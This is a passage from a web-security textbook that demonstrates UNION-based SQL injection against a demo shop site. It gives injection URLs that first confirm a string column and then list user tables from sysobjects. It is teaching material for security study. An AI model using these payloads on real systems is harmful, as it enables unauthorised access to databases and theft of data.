The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

We now verify that the first column in the query contains string data:

https://wahh-app.com/products.asp?q=hub’%20union%20select%20’a’,null--

PRODUCT

PRICE

Netgear Hub (4-port)

£30 

Netgear Hub (8-port)

£40 

a

Our next step is to find out the names of the database tables that may con-

tain interesting information. We can do this by querying the 

sysobjects

table,

which contains details of all objects within the database. To retrieve only the

user-defined objects, we specify the type 

U

:

https://wahh-app.com/products.asp?q=hub’%20union%20select%20name,

null%20from%20sysobjects%20where%20xtype%3d’U’--

Download 5,76 Mb.

Do'stlaringiz bilan baham: